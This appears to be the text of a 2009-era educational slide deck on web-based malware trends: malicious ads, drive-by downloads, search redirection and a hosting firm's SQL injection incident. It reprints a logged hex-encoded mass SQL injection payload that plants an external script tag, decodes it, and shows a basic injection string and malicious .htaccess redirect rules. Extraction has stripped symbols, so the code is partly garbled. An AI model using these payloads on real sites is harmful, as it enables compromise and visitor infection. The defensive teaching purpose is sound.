Web-Based Malware Menace Spreading Fast

1
Web-Based Malware Menace Spreading Fast
Presented By

• Garry Bennett
• Marcelo Berger
• Kelley Gambera
• Elsa Madrigal
• David Pessis
• Chuck Roth
• Fred Salchli

2
Malware Behavior is Changing

• Malware no longer exclusive to malicious sites
• Malware making its way to end user machine with
  no user interaction required
• Malware establishing presence on end user machine
• There has been explosive growth in new malicious
  code signatures

Table 1. New malicious code signatures Source
Symantec Corporation
3
Interesting Trends

• Malware are targeting mainstream sites
• In 2008, Economist.com and MLB.com were both hit
• Malware authors used DoubleClicks ad-serving
  software
• Unsuspecting users clicked on what looked to be
  legitimate ads, but were actually clicking on a
  Trojan which installed itself on the users hard
  drive to collect personal information
• Malware authors are now looking for a bigger
  audience
• Mainstream sites provide this base
• Users who go to these sites are less likely to be
  concerned about being the victim of malware
  attack
• This is an increasing problem since the notion of
  being safe if one visits good sites no longer
  holds true
• Web servers have evolved into complex code
• No longer a static page
• Third-party hosted material
• Network layer communication and exposed weakness

4
Attack Techniques

• SQL injection
• Malicious advertisements
• Search engine result redirection
• Attacks on backend virtual hosting companies
• Vulnerabilities in Web server or forum hosting
  software
• Cross-site scripting (XSS) attacks

5
Attacks Not Mentioned in Paper

• Sniffing Interception (HTTP vs. HTTPS)
• DNS Server Vulnerability Exploits
• Allow malicious sites to be served
• Authenticity Attacks

6
More Popular Attack Techniques SQL Injection

• Large, high-traffic sites have databases running
  in background
• Read/write user interaction
• Security must extend to databases and data
• How it works
• Identifies input form vulnerabilities
• Hacker inserts additional SQL instructions
• Hacker can then navigate database and add mal
  content
• Hidden links
• E.g. Trojan.Asprox

7
SQL Injection Attack at Duo!

• Longstanding Client
• Client merged with another company that had an
  existing e-commerce application
• We hesitantly agreed to integrate and host the
  e-commerce application
• Code review and testing indicated security
  problems
• Client pushed back on risk assessment and claimed
  e-commerce site would be retired in very near
  future
• Two years later ...

7
8
SQL Injection

• First Order Attack
• Attacker gains access to the database and can
  perform DML and/or DDL commands
• Second Order Attack
• Attacker inserts data into the database
• Our attacker did both
• Client called to report strange links appearing
  within the product pages of their site

8
9
SQL Injection Raw IIS Log

• 2008-04-12 175939 W3SVC658304687 WEB14A POST
  /productcart/pc/viewCat_P.asp idCategory57DECLAR
  E _at_S NVARCHAR(4000)SET _at_S
• CAST(0x4400450043004C00410052004500200040005400200
  07600610072006300680061007200280032003500350029002
  C0040004300200076006100720063006800610072002800320
  035003500290020004400450043004C0041005200450020005
  400610062006C0065005F0043007500720073006F007200200
  043005500520053004F005200200046004F005200200073006
  5006C00650063007400200061002E006E0061006D0065002C0
  062002E006E0061006D0065002000660072006F006D0020007
  300790073006F0062006A006500630074007300200061002C0
  073007900730063006F006C0075006D006E007300200062002
  00077006800650072006500200061002E00690064003D00620
  02E0069006400200061006E006400200061002E00780074007
  900700065003D00270075002700200061006E0064002000280
  062002E00780074007900700065003D003900390020006F007
  200200062002E00780074007900700065003D0033003500200
  06F007200200062002E00780074007900700065003D0032003
  300310020006F007200200062002E007800740079007000650
  03D00310036003700290020004F00500045004E00200054006
  10062006C0065005F0043007500720073006F0072002000460
  0450054004300480020004E004500580054002000460052004
  F004D00200020005400610062006C0065005F0043007500720
  073006F007200200049004E0054004F002000400054002C004
  000430020005700480049004C0045002800400040004600450
  05400430048005F005300540041005400550053003D0030002
  900200042004500470049004E0020006500780065006300280
  0270075007000640061007400650020005B0027002B0040005
  4002B0027005D00200073006500740020005B0027002B00400
  043002B0027005D003D0072007400720069006D00280063006
  F006E007600650072007400280076006100720063006800610
  072002C005B0027002B00400043002B0027005D00290029002
  B00270027003C0073006300720069007000740020007300720
  063003D0068007400740070003A002F002F007700770077002
  E006100730070006400650072002E0063006F006D002F00310
  02E006A0073003E003C002F007300630072006900700074003
  E0027002700270029004600450054004300480020004E00450
  0580054002000460052004F004D00200020005400610062006
  C0065005F0043007500720073006F007200200049004E00540
  04F002000400054002C0040004300200045004E00440020004
  3004C004F005300450020005400610062006C0065005F00430
  07500720073006F00720020004400450041004C004C004F004
  30041005400450020005400610062006C0065005F004300750
  0720073006F007200 AS NVARCHAR(4000))EXEC(_at_S)--
  80 - 125.65.77.25 HTTP/1.0 Mozilla/3.0(compatible
  IndyLibrary) - - www.clientname.com 200 0 0
  471 2377 2562

9
10
SQL Injection 1st Order Attack

• POST /productcart/pc/viewCat_P.asp idCategory57
• DECLARE _at_S NVARCHAR(4000)SET _at_S
• DECLARE _at_T varchar(255),_at_C varchar(255)
• DECLARE Table_Cursor CURSOR FOR
• select a.name,b.name
• from sysobjects a,syscolumns b
• where a.idb.id and a.xtype'u' and (b.xtype99
  or b.xtype35 or b.xtype231 or b.xtype167)
• AS NVARCHAR(4000))EXEC(_at_S)

10
11
SQL Injection 2nd Order Attack

• OPEN Table_Cursor
• FETCH NEXT FROM Table_Cursor
• INTO _at_T,_at_C WHILE(_at__at_FETCH_STATUS0)
• BEGIN exec('update '_at_T'
• set '_at_C'
• rtrim(convert(varchar,'_at_C'))
• ''ltscript srchttp//www.axxxr.com/1.jsgtlt/scriptgt'
  '')
• FETCH NEXT FROM Table_Cursor INTO _at_T,_at_C
• END
• CLOSE Table_Cursor
• DEALLOCATE Table_Cursor

11
12
SQL Injection Remediation

• We immediately shut down the application
• We built a scrubber which scanned database tables
  for signature and removed malicious calls
• E commerce site was disintegrated from main site
• Unhappy client Unhappy service provider

12
13
More Popular Attack Techniques Malicious Ads

• Malware delivered via what appears to be real ad
• Issues
• Not all
• advertisers validate the ads hosted on
• legitimate sites
• The nature of advertising/online
• publishing mechanisms dynamic and
• automated, thus difficult to trace
• Authored using JavaScript
• Functions can be easily misused to silently
  redirect user to malicious page regardless if
  hosting site remains clean
• Ads are hard to detect because they quickly
  rotate
• Rotate based on search parameters and/or end-user
  geography
• Web site and ad publishers are unaware that ads
  contain malware

14
More Popular Attack Techniques Malicious Ads

• How Malicious ads work
• Pop up over a web site and redirect user to web
  page filled with malicious software
• Entices user to click a link, which results in
  loading of malicious web site
• Auto-redirects often utilize Flash technology
  whereas click-throughs use JavaScript or ActiveX
  to create pop up with clickable options

Additional Source Smart Computing, How to Get
Rid of Malicious Ads, May 2008
http//www.smartcomputing.com/editorial/article.as
p?articlearticles2F20082Fs19052F25s052F25s05.
asp
15
More Popular Attack Techniques Search Engine
Result Redirection

• Poisoned keywords related to popular searches
• Metatags in web pages used to perform search
  engine optimization
• Example Easter verse, Easter verse poems, Easter
  greeting card verses
• Re-directs to Malware Sites
• Malware is downloaded
• Misleading Apps are downloaded anti-virus,
  windows updates, etc.
• Detection Avoidance
• Referrer checking avoid researchers who could be
  investigating the referral to the site
• Modify HTTP Headers to avoid caching of pages
• No-store, No-cache

Source http//cyberinsecure.com/easter-related-s
earch-engine-results-poisoned-redirect-users-to-ma
licious-applications/
16
More Popular Attack Techniques Backend Virtual
Hosting Companies

• Virtual Hosting Companies provide Web server
  hosting services to other companies or
  individuals
• Attacking Virtual Hosts providers hackers with
  avenue to infect multiple sites associated with
  hosts
• GoDaddy.com DDoS Attack Hackers
• knocked down number of cliet Web sites
• for several hours in 2007
• Techniques for compromising legitimate client Web
  sites
• Exploit applications on host to inject malicious
  code (HTML iframes), and host then injects same
  code into client sites
• DNS Spoofing attack using virtual Host name

17
How Malware Authors Reach Users

• Get on to the users computer automatically
• DNS cache poisoning
• Drive by download
• Software vulnerabilities
• Web attack toolkits
• Cat and mouse game
• Obfuscation
• Dynamically changing URLs and malware
• Clickjacking
• Get on to the users computer with help from the
  user
• Fake codec
• Malicious P2P files
• Mal ads
• Fake scanner web page
• Blogs

18
Drive By Download

• User just browses site and executable content is
  auto-downloaded onto user computer without their
  knowledge
• True Four Years Ago Browsers are more defensive
  today
• Degrees of insecurity according to corporate
  policies
• Some apps only supported by older browser
  versions
• No user interaction required
• Good web sites are targeted by attackers to
  establish user trust
• Issue
• OS and browser may have latest patches but
  multimedia plug-ins and doc viewers are out of
  date and vulnerable
• Attack method
• Hidden IFrame causes user browser to silently
  pull mal content
• Mal authors are then able to pull OS, browser,
  etc. vulnerabilities and eventually pull personal
  information

Entire attack is invisible to user
19
Other Automatic Attack Methods

• Software vulnerabilities
• Bugs or flaws in applications
• Attacker can compromise system on which software
  is installed
• Web attack toolkits
• Off-the-shelf software written to probe users
  computer and automatically exploit security holes
• Obfuscation
• Encryption of malcode, typically in JavaScript
• Dynamically changing URLs and malware
• Malicious domains which appear to be real ones
  associated with search engine statistics
• Clickjacking
• Attacker puts invisible layer on Web page and
  user unknowingly clicks fake buttons, links to
  malware

20
Older Detection Techniques No Longer Work

• Older, signature-based antivirus-only detection
  techniques are far less effective
• Multimedia, reader, browser, and third-party
  software vulnerabilities are hard to detect using
  traditional virus signatures
• Traditional antivirus software only knows how to
  search in files, not network
• Attacks are invisible
• New methods for detection are necessary
• Security is heavily dependent on users habits ?
  i.e. needs to keep up with patches, security
  updates, etc.
• Security lockdown is practiced by website owners
  who have high stakes in secure web transactions

21
User-Assisted Attack Methods

• Social engineering
• People are tricked into performing actions
• Examples
• Fake codec
• Software that can decode a binary file and
  reconstitute a version of the original audio or
  video
• Tempting content gives malware authors the
  ability to get users to install new codec to
  reach desired content
• Screenshot shows fake codec to install video, but
  instead its malware
• Trojan is installed and infects users computer
• Malicious P2P files
• Files using celebrity names or popular brand names

22
User-Assisted Attack Methods (contd)

• Examples
• Malicious ads
• One of the most blatant techniques
• Direct advertisement of malware to unsuspecting
  users (in contrast to using actual
  product/company names)
• E.g. Fake copy of a newly-released game
• Fake scanner web page
• Leverage JavaScript capabilities of a browser
• Content appears to be legitimate OS alert
  notification
• A scare tactic approach to get users to execute
  malware
• Blogs
• Bogus links which point to malware

23
Symantec Top Web Threats 2008

• Drive-by downloads
• Obfuscation
• Targeting browser plug-ins instead of just
  browser
• Misleading apps
• SQL injection in mainstream sites
• Unique and targeted malware
• Polymorphing Tools

24
New Threats for 2009 and Beyond

• Bogus services
• Legal, financial, car transport
• Mule recruitment sites
• Spam
• Professional-looking sites
• Social networking vulnerabilities with Web 2.0
• Hacked accounts
• Cross-Site Scripting (XSS)
• Cross Site Request Forgery (CSRF)
• Phishing
• Information Leakage
• Injection flaws (Javascript, XML, Xpath, JSON)
• Information integrity (i.e. wrong entries on
  wikipedia)
• Insufficient anti-automation
• vulnerable to brute force and CSRF attacks
• High-visibility news events
• Quick distribution of malware
• Replacement of email attachments with hyperlinks

Twitter CSRF Attack
Source Top Web 2.0 Security Threats, Secure
Enterprise 2.0 Forum
25
Methods of Defense

• Techniques for Counter-Acting Web-based Attacks
• User-awareness (dont click on anything funny)
• Dont download apps you dont trust
• Keep your OS updated
• Use anti-phishing, malware, spam software

No single silver bullet Just a bunch of silver
bbs
26
Garrys Slides
27
SQL Injection Example

• // a good user's name
• name "timmy"
• query "SELECT FROM customers WHERE username
  'name'"
• echo "Normal " . query . "ltbr /gt"
• // user input that uses SQL Injection
• name_bad "' OR 1'"
• // our MySQL query builder, however, not a very
  safe one
• query_bad "SELECT FROM customers WHERE
  username 'name_bad'"

28
SQL Injection Example - Cont.

• // display what the new query will look like,
  with injection echo "Injection " . query_bad
• Normal SELECT FROM customers WHERE username
  'timmy
• Injection SELECT FROM customers WHERE username
  '' OR 1''

29
More Popular Attack Techniques Search Engine
Results Redirection

• Legitimate sites that have been hacked to
  redirect to various rogue anti-malware scan
  sites
• The malicious redirect only occurs when a user
  arrives at the site via search engine results
• Visiting the sites directly
• (i.e. via a bookmark or manually
• entering the address) results in
• no redirect
• Site owners visiting their site
• directly wont see any evidence
• of the redirect
• Since many sites receive a majority of their
  traffic from search engines, that large majority
  of users will keep getting redirected to the
  malicious site

30
More Popular Attack Techniques Search Engine
Result Redirection Example

• The root cause of many of these hacks is a
  maliciously modified .htaccess file commonly used
  on Apache web servers
• RewriteEngine On
• RewriteCond HTTP_REFERER .google. NC,OR
• RewriteCond HTTP_REFERER .yahoo. NC,OR
• RewriteCond HTTP_REFERER .msn. NC,OR
• RewriteCond HTTP_REFERER .ask. NC,OR
• RewriteCond HTTP_REFERER .aol. NC,OR
• RewriteCond HTTP_REFERER .altavista.
  NC,OR
• RewriteCond HTTP_REFERER .netscape. NC
• ...
• RewriteRule . http//badsite-omitted/ R301,L
• In some cases its replaced completely, in other
  cases the bad rules are added to the existing
  contents.

31
More Popular Attack Techniques Malicious Ads
Example